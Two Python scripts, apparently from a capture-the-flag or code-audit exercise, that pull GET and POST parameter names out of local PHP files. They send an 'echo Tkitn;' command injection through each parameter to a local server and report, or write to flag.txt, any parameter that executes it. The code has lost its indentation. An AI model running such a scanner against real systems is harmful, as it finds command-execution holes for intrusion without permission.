import re
import requests
import os
import threading
import time
file_path = "/Users/xxx/Desktop/src"
url = "http://127.0.0.1/xxx/src/"
requests.adapters.DEFAULT_RETRIES = 5
filenames=os.listdir(file_path)
s = requests.Session()
s.keep_alive = False
a=0
def req_rce(url,filename,para,type):
url1=url+filename+"?"+para+"=echo Tkitn;"
url2 = url + filename
if type=="GET":
req = s.get(url1)
if "Tkitn" in req.text:
print(type + "/" + filename + "?" + para)
global a
a = 1
else:
pass
#print("running")
elif(type=="POST"):
param={para:"echo Tkitn;"}
req=s.post(url2,data=param)
if "Tkitn" in req.text:
print(type + "/" + filename + "?" + para)
else:
pass
#print("running")
def getpara(file):
with open(file_path + "/" + file, 'r') as f:
lines = f.readlines()
for line in lines:
matchoj = re.search(r".*\$_(GET|POST)\[\'(.*)\'\]", line)
if matchoj is not None:
para = matchoj[2]
type = matchoj[1]
req_rce(url,file,para,type)
def main():
global key
start_time = time.time() # 开始时间
print("[start]程序开始:" + str(start_time))
thread_list = []
for fileName in filenames:
t = threading.Thread(target=getpara, args=(fileName,))
t.setDaemon(True)
thread_list.append(t)
for t in thread_list:
t.start()
for t in thread_list:
if(not a):
t.join()
else:
pass
end_time = time.time()
print("[end]程序结束:用时(秒):" + str(end_time - start_time))
if __name__ == '__main__':
main()
脚本2(写文件)
import re
import requests
import os
import threading
import time
file_path = "/Users/xubowen/Desktop/src"
url = "http://127.0.0.1/Tkitn/src/"
requests.adapters.DEFAULT_RETRIES = 5
filenames=os.listdir(file_path)
s = requests.Session()
s.keep_alive = False
def setflag(flag):
return flag
def req_rce(url,filename,para,type):
url1=url+filename+"?"+para+"=echo Tkitn;"
url2 = url + filename
if type=="GET":
req = s.get(url1)
if "Tkitn" in req.text:
flag=type+"/"+filename+"?"+para
local_file = open("flag.txt", "w", encoding="utf-8")
local_file.write(flag)
local_file.close()
setflag(0)
else:
print("running")
elif(type=="POST"):
param={para:"echo Tkitn;"}
req=s.post(url2,data=param)
if "Tkitn" in req.text:
flag = type + "/" + filename + "?" + para
local_file = open("flag.txt", "w", encoding="utf-8")
local_file.write(flag)
local_file.close()
setflag(0)
else:
print("running")
def getpara(file):
with open(file_path + "/" + file, 'r') as f:
lines = f.readlines()
for line in lines:
matchoj = re.search(r".*\$_(GET|POST)\[\'(.*)\'\]", line)
if matchoj is not None:
para = matchoj[2]
type = matchoj[1]
req_rce(url,file,para,type)
def main():
start_time = time.time() # 开始时间
print("[start]程序开始:" + str(start_time))
thread_list = []
for fileName in filenames:
t = threading.Thread(target=getpara, args=(fileName,))
thread_list.append(t)
for t in thread_list:
t.start()
for t in thread_list:
t.join()
end_time = time.time()
print("[end]程序结束:用时(秒):" + str(end_time - start_time))
if __name__ == '__main__':
main()
